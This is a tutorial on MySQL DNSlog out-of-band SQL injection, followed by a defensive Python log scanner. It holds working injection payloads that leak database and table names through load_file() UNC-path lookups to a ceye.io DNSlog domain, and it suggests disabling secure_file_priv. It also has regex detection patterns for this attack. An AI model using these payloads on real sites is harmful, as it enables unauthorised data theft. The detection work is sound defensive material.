When an injection returns no visible output, DNSlog out-of-band injection can be tried instead.
MySQL DNSlog out-of-band exfiltration relies on the load_file() function, which requires that the current database user has file read privilege and that secure_file_priv is configured to allow it.
C:\phpStudy\PHPTutorial\MySQL\bin>mysql -uroot -p
Enter password: ****
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 138
Server version: 5.5.53 MySQL Community Server (GPL)
Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
1. secure_file_priv set to NULL: import and export are not allowed.
2. secure_file_priv set to a directory: MySQL import and export can only happen inside that directory.
3. secure_file_priv not set (empty): no restriction at all.
Set secure_file_priv to empty to make testing easier.
mysql> show variables like '%secure%';
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_auth | OFF |
| secure_file_priv | NULL |
+------------------+-------+
2 rows in set (0.02 sec)
mysql>
Windows: edit my.ini and add secure_file_priv = under [mysqld]
Linux: edit my.cnf and add secure_file_priv = under [mysqld]
Restart MySQL and the setting takes effect.
Self-hosted DNSlog platform: https://github.com/BugScanTeam/DNSLog
Online platform: http://ceye.io/
The online platform is used here.
payload:id=1' and (select load_file(concat('\\\\',(select database()),'.xxxxxx.ceye.io\\abc')))%23
Querying the table names:
id=1' and (select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 1),'.xxxxx.ceye.io\\abc')))%23
id=1' and (select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 1,1),'.xxxxx.ceye.io\\abc')))%23
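As an added defender-side example (not part of the original post), a small Python scanner that flags request log lines carrying the load_file()/UNC-path DNS out-of-band pattern shown above and classifies a secure_file_priv value according to the three cases listed; the request lines are constructed samples, one of them the post's own first payload.

```python
import re
from urllib.parse import unquote

# Signature of the technique described above: load_file() handed a UNC path
# ("\\\\host\\share") assembled with concat(), so the resolver lookup for
# "host" carries query output to the attacker's DNSlog zone.
LOAD_FILE_RE = re.compile(r"load_file\s*\(", re.IGNORECASE)
CONCAT_RE = re.compile(r"concat\s*\(", re.IGNORECASE)
UNC_RE = re.compile(r"\\{2,}")  # two or more literal backslashes
DOMAIN_RE = re.compile(r"'\.((?:[a-z0-9-]+\.)+[a-z0-9-]+)\\{2,}", re.IGNORECASE)

# Constructed sample request lines (not real traffic): the second is the
# post's first payload verbatim, the third is the same payload URL-encoded.
SAMPLE_REQUESTS = [
    "GET /item.php?id=1 HTTP/1.1",
    r"GET /item.php?id=1' and (select load_file(concat('\\\\',(select database()),'.xxxxxx.ceye.io\\abc')))%23 HTTP/1.1",
    "GET /item.php?id=1%27%20and%20(select%20load_file(concat(%27%5C%5C%5C%5C%27,(select%20database()),%27.xxxxxx.ceye.io%5C%5Cabc%27)))%23 HTTP/1.1",
    "GET /report.php?path=select%20load_file(%27/etc/hosts%27) HTTP/1.1",
]

def classify_request(line):
    """Return a finding dict for a load_file() attempt, or None for benign lines."""
    decoded = unquote(line)  # parameters arrive URL-encoded (%27, %5C, %23 ...)
    if not LOAD_FILE_RE.search(decoded):
        return None
    if CONCAT_RE.search(decoded) and UNC_RE.search(decoded):
        m = DOMAIN_RE.search(decoded)  # pull out the DNSlog zone being called back
        return {"kind": "load_file_dns_oob",
                "callback_domain": m.group(1) if m else None}
    return {"kind": "load_file_other", "callback_domain": None}

def scan(lines):
    """Run classify_request over many log lines, keeping only the findings."""
    findings = []
    for line in lines:
        finding = classify_request(line)
        if finding:
            findings.append((line, finding))
    return findings

def classify_secure_file_priv(value):
    """Map a secure_file_priv value to the three cases listed in the post."""
    if value is None or value.upper() == "NULL":
        return "disabled"      # import/export not allowed
    if value == "":
        return "unrestricted"  # no restriction: load_file() may read anywhere
    return "restricted"        # only inside the named directory

if __name__ == "__main__":
    for line, finding in scan(SAMPLE_REQUESTS):
        print(finding["kind"], finding["callback_domain"], line[:60])
    for v in ("NULL", "", "/var/lib/mysql-files/"):
        print(repr(v), "->", classify_secure_file_priv(v))
```

A finding of kind load_file_dns_oob with a callback domain is the signal to correlate against outbound DNS queries from the database host.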